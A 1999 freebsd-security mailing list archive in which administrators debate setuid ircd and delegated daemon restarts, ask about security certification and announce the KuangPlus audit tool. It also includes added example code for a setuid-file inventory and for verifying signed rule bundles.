potentially > >> compromise your machine. > >> > >> If it's for a small group of users who you trust fairly well, you > >> probably should be okay, though. 
> > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 18:28:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from zerlargal.humbug.org.au (zerlargal.humbug.org.au [203.143.240.7]) by hub.freebsd.org (Postfix) with ESMTP id C335714DBD for ; Tue, 1 Jun 1999 18:28:54 -0700 (PDT) (envelope-from bc@thehub.com.au) Received: from localhost ([127.0.0.1] helo=zerlargal.humbug.org.au) by zerlargal.humbug.org.au with smtp (Exim 2.05 #3) id 10ozos-0003B5-00; Wed, 2 Jun 1999 11:27:50 +1000 Date: Wed, 2 Jun 1999 11:27:49 +1000 (EST) 
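Cain's advice above (keep track of which setuid programs exist and watch their sizes) is easy to automate. The script below is an editorial example added to this archive page; it is not code posted by anyone on the list and not part of FreeBSD. It walks a tree, records every setuid/setgid regular file with its owner, mode, size and SHA-256 digest, and diffs the result against a JSON baseline. The digest goes beyond the size check Cain mentions, because a replaced binary can trivially be padded to the old size. The script name `suidwatch.py` and the baseline path are assumptions.

```python
#!/usr/bin/env python3
"""Inventory setuid/setgid files under a root and diff against a baseline.

Added example for this archive page; not code from the FreeBSD project
or from anyone on the list. The script name and baseline path are assumptions.
"""
import hashlib
import json
import os
import stat
import sys

SPECIAL_BITS = stat.S_ISUID | stat.S_ISGID


def _sha256(path):
    """Hex SHA-256 of a file's contents, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_setuid(root):
    """Return {path: record} for every regular file under root that has the
    setuid or setgid bit set.  Symlinks are not followed, and directories
    that cannot be read are skipped instead of aborting the whole scan."""
    inventory = {}
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & SPECIAL_BITS):
                continue
            try:
                digest = _sha256(path)
            except OSError:
                digest = None                # unreadable contents: still record it
            inventory[path] = {
                "uid": st.st_uid,
                "gid": st.st_gid,
                "mode": oct(stat.S_IMODE(st.st_mode)),
                "size": st.st_size,
                "sha256": digest,
            }
    return inventory


def diff_inventory(baseline, current):
    """Return (added, changed, removed) as sorted lists of paths.  A file is
    'changed' when any recorded attribute (owner, mode, size, digest) differs."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, changed, removed


def main(argv):
    """suidwatch.py BASELINE.json [ROOT]: write the baseline on first run,
    afterwards report differences and exit non-zero if there are any."""
    if len(argv) not in (2, 3):
        print("usage: suidwatch.py BASELINE.json [ROOT]", file=sys.stderr)
        return 2
    baseline_path = argv[1]
    root = argv[2] if len(argv) == 3 else "/"
    current = scan_setuid(root)
    if not os.path.exists(baseline_path):
        with open(baseline_path, "w") as f:
            json.dump(current, f, indent=1, sort_keys=True)
        print("baseline written: %d setuid/setgid files" % len(current))
        return 0
    with open(baseline_path) as f:
        baseline = json.load(f)
    added, changed, removed = diff_inventory(baseline, current)
    for tag, paths in (("NEW", added), ("CHANGED", changed), ("GONE", removed)):
        for p in paths:
            print(tag, p, json.dumps(current.get(p) or baseline[p]))
    return 1 if (added or changed or removed) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as root from cron (`suidwatch.py /var/db/suid-baseline.json /`) and mail any non-empty output; the baseline itself must live somewhere shell users cannot write, or it is only as trustworthy as the box. This does not replace tripwire, which covers far more than the setuid bit, and later FreeBSD releases ship a similar setuid diff in the daily periodic security run.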
From: Bruce Campbell X-Sender: bc@zerlargal.humbug.org.au To: Cain Cc: freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 1 Jun 1999, Cain wrote: > In addition to tripwire, monitor the existence of all SUID programs, when > new ones appear make sure you know about it. BTW, ircd is usually SUID, so > if a user of yours sets that up it's normal. But then how do you know a > hacker just hasn't named his root shell ircd... so monitor the sizes of > new SUID programs Possibly putting my foot in my mouth here, but *why* would ircd need to be SUID to anyone? It commonly runs at the high ports (6667) and thus does not need root for that. If you want a specific ircd user to run ircd (either by script or by respawning from init), I don't see a need for the ircd binary to be SUID to anyone (executable only by that user yes, SUID no). Or am I missing something here? --==-- Bruce. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 18:45: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 7144B14DBD for ; Tue, 1 Jun 1999 18:44:50 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id LAA21482; Wed, 2 Jun 1999 11:47:27 +1000 (EST) (envelope-from akm) 
From: Andrew Kenneth Milton Message-Id: <199906020147.LAA21482@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: from Bruce Campbell at "Jun 2, 1999 11:27:49 am" To: bc@thehub.com.au (Bruce Campbell) Date: Wed, 2 Jun 1999 11:47:27 +1000 (EST) Cc: cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Bruce Campbell ]--------------------------------------------- | On Tue, 1 Jun 1999, Cain wrote: | | > In addition to tripwire, monitor the existence of all SUID programs, when | > new ones appear make sure you know about it. BTW, ircd is usually SUID, so | > if a user of yours sets that up it's normal. But then how do you know a | > hacker just hasn't named his root shell ircd... so monitor the sizes of | > new SUID programs | | Possibly putting my foot in my mouth here, but *why* would ircd need to be | SUID to anyone? It commonly runs at the high ports (6667) and thus does | not need root for that. | | If you want a specific ircd user to run ircd (either by script or by | respawning from init), I don't see a need for the ircd binary to be SUID | to anyone (executable only by that user yes, SUID no) | | Or am I missing something here? It's normally suid because the conf files are readable only by the 'owner' -- it's also suid to limit the damage you can do; normally you set up an 'irc' account and make it suid that. 
-- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 19:19:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from Argon.Mlink.NET (Argon.Mlink.NET [205.236.182.18]) by hub.freebsd.org (Postfix) with ESMTP id E0BB81529C for ; Tue, 1 Jun 1999 19:19:29 -0700 (PDT) (envelope-from matt@Mlink.NET) Received: from aic-gw.mlink.net (matt@[209.104.118.65]) by Argon.Mlink.NET (8.8.8/8.8.2) with ESMTP id WAA09921; Tue, 1 Jun 1999 22:16:47 -0400 (EDT) Date: Tue, 1 Jun 1999 22:19:03 -0400 (EDT) 
From: matt To: Andrew Kenneth Milton Cc: Bruce Campbell , cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: <199906020147.LAA21482@mail.theinternet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: [...] : It's normally suid because the conf files are readable only by the : 'owner' -- it's also suid to limit the damage you can do, normally : you setup an 'irc' account and make it suid that. Actually, You normally would make an account called irc or ircd, chmod that home directory 700, set the D/S paths in the ircd config, and run it FROM the irc home dir, with the conf chmod 600. There's absolutely no need to SUID ircd at all, nor would I recommend it. Matt : -- : Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew : The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton : ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig : PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist -- DISCLAIMER: Anyone sending me unsolicited commercial electronic mail will be charged a $100 fee for time spent reading it. Do NOT send this type of electronic mail to me. In reading this, you automatically agree to be subjected to these terms: US Code Title 47, Sec.227(a)(2)(B), a computer/modem/printer meets the definition of a telephone fax machine. By Sec.227(b)(1)(C), it is unlawful to send any unsolicited advertisement to such equipment. By Sec.227(b)(3)(C), a violation of the aforementioned Section is punishable by action to recover actual monetary loss, or $500, whichever is greater, for each violation. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 19:52:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id CCD5D14DE0 for ; Tue, 1 Jun 1999 19:52:37 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id MAA22390; Wed, 2 Jun 1999 12:54:39 +1000 (EST) (envelope-from akm) 
From: Andrew Kenneth Milton Message-Id: <199906020254.MAA22390@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: from matt at "Jun 1, 1999 10:19: 3 pm" To: matt@Mlink.NET (matt) Date: Wed, 2 Jun 1999 12:54:39 +1000 (EST) Cc: akm@mail.theinternet.com.au, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ matt ]--------------------------------------------- | On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: | | [...] | | : It's normally suid because the conf files are readable only by the | : 'owner' -- it's also suid to limit the damage you can do, normally | : you setup an 'irc' account and make it suid that. | | Actually, You normally would make an account called irc or ircd, chmod | that home directory 700, set the D/S paths in the ircd config, and run | it FROM the irc home dir, with the conf chmod 600. There's absolutely | no need to SUID ircd at all, nor would I recommend it. Unless you have multiple remote admins, who you don't want to be able to stuff with the conf files, but, you do want them to be able to restart the daemon. 
-- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20: 9:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id 2DF3A14DE0 for ; Tue, 1 Jun 1999 20:09:46 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 59581 invoked from network); 2 Jun 1999 03:09:46 -0000 Received: from shell-1.enteract.com (dscheidt@207.229.143.40) by pop3-3.enteract.com with SMTP; 2 Jun 1999 03:09:46 -0000 Received: from localhost (dscheidt@localhost) by shell-1.enteract.com (8.9.3/8.9.2) with SMTP id WAA11875; Tue, 1 Jun 1999 22:09:41 -0500 (CDT) (envelope-from dscheidt@enteract.com) X-Authentication-Warning: shell-1.enteract.com: dscheidt owned process doing -bs Date: Tue, 1 Jun 1999 22:09:41 -0500 (CDT) 
From: David Scheidt To: Andrew Kenneth Milton Cc: matt , bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: <199906020254.MAA22390@mail.theinternet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: > Unless you have multiple remote admins, who you don't want to be > able to stuff with the conf files, but, you do want them to be able > to restart the daemon. People you don't trust to change the conf files shouldn't be doing admin tasks. David scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:14: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 8CCF414D6C for ; Tue, 1 Jun 1999 20:13:58 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id UAA86277; Tue, 1 Jun 1999 20:13:42 -0700 (PDT) (envelope-from dillon) Date: Tue, 1 Jun 1999 20:13:42 -0700 (PDT) 
From: Matthew Dillon Message-Id: <199906020313.UAA86277@apollo.backplane.com> To: Andrew Kenneth Milton Cc: matt@Mlink.NET (matt), akm@mail.theinternet.com.au, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system References: <199906020254.MAA22390@mail.theinternet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :| :| Actually, You normally would make an account called irc or ircd, chmod :| that home directory 700, set the D/S paths in the ircd config, and run :| it FROM the irc home dir, with the conf chmod 600. There's absolutely :| no need to SUID ircd at all, nor would I recommend it. : :Unless you have multiple remote admins, who you don't want to be :able to stuff with the conf files, but, you do want them to be able :to restart the daemon. : :-- :Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew You can always argue that your favorite methods of admin require binaries to be suid-root, but all it means is that you need to change your methods. In this case, I can think of several ways to avoid running ircd as root or with root and have admins who do not have root or access to the ircd account nevertheless be able to restart the daemon. Perhaps with a special port/password, or simply with a suid-ircd program which kills and restarts ircd. No brainer. No root access required. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:14:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 5AFA215244 for ; Tue, 1 Jun 1999 20:14:28 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id NAA22732; Wed, 2 Jun 1999 13:16:50 +1000 (EST) (envelope-from akm) 
From: Andrew Kenneth Milton Message-Id: <199906020316.NAA22732@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: from David Scheidt at "Jun 1, 1999 10: 9:41 pm" To: dscheidt@enteract.com (David Scheidt) Date: Wed, 2 Jun 1999 13:16:50 +1000 (EST) Cc: akm@mail.theinternet.com.au, matt@Mlink.NET, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ David Scheidt ]--------------------------------------------- | On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: | | > Unless you have multiple remote admins, who you don't want to be | > able to stuff with the conf files, but, you do want them to be able | > to restart the daemon. | | People you don't trust to change the conf files shouldn't be doing admin | tasks. A sweeping generalisation certainly applicable to every situation conceivable to you. However, to other people the notion of levels of access is useful. You can do some things, but, you can't do everything. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:19:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 4A38315126 for ; Tue, 1 Jun 1999 20:19:32 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id NAA22830; Wed, 2 Jun 1999 13:21:48 +1000 (EST) (envelope-from akm) 
From: Andrew Kenneth Milton Message-Id: <199906020321.NAA22830@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: <199906020313.UAA86277@apollo.backplane.com> from Matthew Dillon at "Jun 1, 1999 8:13:42 pm" To: dillon@apollo.backplane.com (Matthew Dillon) Date: Wed, 2 Jun 1999 13:21:48 +1000 (EST) Cc: akm@mail.theinternet.com.au, matt@Mlink.NET, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Matthew Dillon ]--------------------------------------------- | : | :Unless you have multiple remote admins, who you don't want to be | :able to stuff with the conf files, but, you do want them to be able | :to restart the daemon. | : | | You can always argue that your favorite methods of admin require | binaries to be suid-root, but all it means is that you need to change | your methods. I'd agree that you don't want it suid root, but I don't agree that you don't want it suid some other non-privileged user. 
-- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:29:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from blackhole.pmg.net (blackhole.pmg.net [209.137.70.29]) by hub.freebsd.org (Postfix) with ESMTP id 05F2B151A9 for ; Tue, 1 Jun 1999 20:29:18 -0700 (PDT) (envelope-from pritchet@bigfoot.com) Received: from fury (localhost [127.0.0.1]) by blackhole.pmg.net (8.9.2/8.9.2) with SMTP id XAA02290 for ; Tue, 1 Jun 1999 23:37:45 -0400 (EDT) (envelope-from pritchet@bigfoot.com) Message-Id: <4.1.19990601232241.0093e100@127.0.0.1> X-Sender: pritchet@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 01 Jun 1999 23:24:19 -0400 To: freebsd-security@freebsd.org 
From: Ron Pritchett Subject: Security Certification for individuals Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was wondering if any of the security organizations (CERT, ICSA, etc) offer certification for individuals... I was thinking along the lines of Sun and Cisco's programs..... thanks! --- Ron++ Atlanta, GA "This message has been digitally remastered and letterboxed to 16:9 format for your viewing pleasure." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:32: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id A3A14151A9 for ; Tue, 1 Jun 1999 20:32:01 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id UAA86389; Tue, 1 Jun 1999 20:31:53 -0700 (PDT) (envelope-from dillon) Date: Tue, 1 Jun 1999 20:31:53 -0700 (PDT) 
From: Matthew Dillon Message-Id: <199906020331.UAA86389@apollo.backplane.com> To: Andrew Kenneth Milton Cc: akm@mail.theinternet.com.au, matt@Mlink.NET, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system References: <199906020321.NAA22830@mail.theinternet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :I'd agree that you don't want it suid root, I don't agree that you :don't want it suid some other non-privileged user. : :-- :Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew If the admin is supposed to be able to do some operation on the server, such as restart it, then having a suid-(server-uid) program that does that *ONE* thing and making it group-executable to the set of admins allowed to do that *ONE* thing is not going to compromise security any more than giving the admin access to the (server-uid) account. It is appropriate to be wary of suid programs, but not overly paranoid. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 21:24:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 1D7EE14DCA for ; Tue, 1 Jun 1999 21:24:16 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id OAA00771; Wed, 2 Jun 1999 14:24:16 +1000 (EST) (envelope-from wkt) 
From: Warren Toomey
Message-Id: <199906020424.OAA00771@henry.cs.adfa.edu.au>
Subject: Idea for New Security Tool
To: security@freebsd.org
Date: Wed, 2 Jun 1999 14:24:16 +1000 (EST)
Reply-To: wkt@cs.adfa.edu.au
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

All,
	I've got a friend, Jeff Howard, working on a security-related Masters
project. Essentially, it's a new version of the COPS/Kuang tool from Spafford
and Farmer, but with one large difference.

In the new version, which we call KuangPlus, the system core is distributed
with just the induction engine and no security rules (well, very few rules).
However, the system has the ability to:

	+ download new rules from the network
	+ verify their authenticity (using public-key crypto)
	+ and load/run the rules on the fly, once verified

The idea is that, as new security vulnerabilities are found, new rules can be
created, signed and put up on the Internet for download. Any individual, group
or organisation can make new rules: the FreeBSD team, individual Linux
distribution teams, the Sendmail guys etc. An admin who is prepared to _trust_
the rules made by organisation X will obtain X's public key and install it
into the KuangPlus system. As the organisation releases new rules, these are
automatically integrated into the local ruleset base.

KuangPlus is mainly designed to find configuration flaws which could lead to
security deficiencies. It's not a network vulnerability tool like Nessus or
SATAN.

Some more details about Jeff Howard's KuangPlus project are on the web at
http://minnie.cs.adfa.edu.au/KuangPlus/

So What?
--------

So why are we posting this info to security@freebsd.org? The project is in
the early stages. We'd dearly love some people to a) tell us what good things
KuangPlus should/shouldn't do, and b) think of areas in the design of the
system which need improvement. Once the system gets to alpha or beta level,
we'd also like to get some FreeBSD rules written! We'll be doing some
ourselves, but the real goal is to get the vendors to write rules for their
own systems.

Anyway, if you're interested in helping out, please email me back. I'll act
as general co-ordinator. Jeff's wife has just had their first baby too, so
Jeff's already got a lot on his plate.

Many thanks in advance for all your suggestions.

	Warren and Jeff

From owner-freebsd-security Tue Jun 1 21:31:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id 4BCC314DCA for ; Tue, 1 Jun 1999 21:31:40 -0700 (PDT) (envelope-from nick@feralmonkey.org)
Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id PAA12347; Wed, 2 Jun 1999 15:21:52 GMT (envelope-from nick@feralmonkey.org)
Date: Wed, 2 Jun 1999 15:21:51 +0000 (GMT)
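An added illustration of the signed-rule distribution Warren Toomey's KuangPlus post describes: a publisher signs a rule file, the admin installs only the public keys of the organisations they trust, and the engine refuses to load anything that does not verify under an installed key. This is example code written for this archive, not KuangPlus's own code; the post gives no file format or key scheme, so the Ed25519 signatures, the "publisher\nrules" signed-message layout, the TrustStore type and the rule-line syntax are all assumptions, and the keys and rule lines are constructed here.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
	"strings"
)

// RuleBundle is the unit an admin downloads: the publishing organisation,
// the rule text, and a detached signature over both. The wire format is an
// assumption made for this example; the KuangPlus post does not describe one.
type RuleBundle struct {
	Publisher string
	Rules     string
	Signature []byte
}

// TrustStore holds the public keys the local admin chose to install, one per
// organisation whose rules they are prepared to trust (assumed structure).
type TrustStore map[string]ed25519.PublicKey

var (
	ErrUnknownPublisher = errors.New("no key installed for publisher")
	ErrBadSignature     = errors.New("rule signature does not verify")
)

// signedMessage binds the publisher name into the signed bytes, so the
// signature covers who claims to have issued the rules as well as their text.
func signedMessage(publisher, rules string) []byte {
	return []byte(publisher + "\n" + rules)
}

// SignBundle is the publisher-side step: sign the rules before posting them.
func SignBundle(priv ed25519.PrivateKey, publisher, rules string) RuleBundle {
	return RuleBundle{
		Publisher: publisher,
		Rules:     rules,
		Signature: ed25519.Sign(priv, signedMessage(publisher, rules)),
	}
}

// VerifyBundle is the admin-side step: refuse anything not signed by an
// installed key. Only a bundle that passes here may be loaded.
func VerifyBundle(ts TrustStore, b RuleBundle) error {
	pub, ok := ts[b.Publisher]
	if !ok {
		return ErrUnknownPublisher
	}
	if !ed25519.Verify(pub, signedMessage(b.Publisher, b.Rules), b.Signature) {
		return ErrBadSignature
	}
	return nil
}

// LoadRules verifies first, then parses the rule text into one name per
// non-blank, non-comment line of the assumed "name: description" form.
// Parsing never happens before verification.
func LoadRules(ts TrustStore, b RuleBundle) ([]string, error) {
	if err := VerifyBundle(ts, b); err != nil {
		return nil, err
	}
	var names []string
	for _, line := range strings.Split(b.Rules, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		name, _, _ := strings.Cut(line, ":")
		names = append(names, strings.TrimSpace(name))
	}
	return names, nil
}

func main() {
	// Constructed keys and rules so the example runs stand-alone.
	pubX, privX, _ := ed25519.GenerateKey(rand.Reader)
	_, privY, _ := ed25519.GenerateKey(rand.Reader) // a key the admin never installed
	ts := TrustStore{"FreeBSD": pubX}

	rules := "# constructed sample rules\n" +
		"world-writable-etc: /etc must not be world writable\n" +
		"suid-in-home: no set-uid files under /usr/home\n"
	good := SignBundle(privX, "FreeBSD", rules)
	fmt.Println(LoadRules(ts, good)) // names of both rules, <nil>

	tampered := good
	tampered.Rules += "extra-rule: appended after signing\n"
	fmt.Println(LoadRules(ts, tampered)) // [] rule signature does not verify

	fmt.Println(LoadRules(ts, SignBundle(privY, "FreeBSD", rules)))  // uninstalled key
	fmt.Println(LoadRules(ts, SignBundle(privX, "Sendmail", rules))) // unknown publisher
}
```

The ordering is the point: verification precedes parsing, so a modified bundle never reaches the rule loader, and a valid signature from a publisher whose key the admin did not install is still rejected.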
From: 0x1c
To: Ron Pritchett
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Security Certification for individuals
In-Reply-To: <4.1.19990601232241.0093e100@127.0.0.1>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I believe the Computer Security Institute offers CISSP. Certified
Information Systems Security Professional or similar.

Nick

On Tue, 1 Jun 1999, Ron Pritchett wrote:

> I was wondering if any of the security organizations (CERT, ICSA, etc.) offer
> certification for individuals... I was thinking along the lines of Sun and
> Cisco's programs.....
>
> thanks!
>
> ---
> Ron++
> Atlanta, GA
>
> "This message has been digitally remastered and
> letterboxed to 16:9 format for your viewing pleasure."

--
Therefore those skilled at the unorthodox are as infinite as heaven and earth,
inexhaustible as the great rivers.
			-- Sun Tzu, The Art of War

From owner-freebsd-security Tue Jun 1 22:47:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ewok.creative.net.au (ewok.creative.net.au [203.30.44.41]) by hub.freebsd.org (Postfix) with SMTP id 0C56114C82 for ; Tue, 1 Jun 1999 22:47:26 -0700 (PDT) (envelope-from adrian@freebsd.org)
Received: (qmail 12311 invoked by uid 1008); 2 Jun 1999 05:47:24 -0000
Message-ID: <19990602054724.12309.qmail@ewok.creative.net.au>
From: adrian@freebsd.org
To: Andrew Kenneth Milton
Cc: freebsd-security@freebsd.org
Subject: Re: Shell Account system
In-reply-to: Your message of "Wed, 02 Jun 1999 11:47:27 +1000." <199906020147.LAA21482@mail.theinternet.com.au>
Date: Wed, 02 Jun 1999 13:47:23 +0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Andrew Kenneth Milton writes:
>+----[ Bruce Campbell ]---------------------------------------------
>| On Tue, 1 Jun 1999, Cain wrote:
>|
>| > In addition to tripwire, monitor the existence of all SUID programs, when
>| > new ones appear make sure you know about it. BTW, ircd is usually SUID, so
>| > if a user of yours sets that up it's normal. But then how do you know a
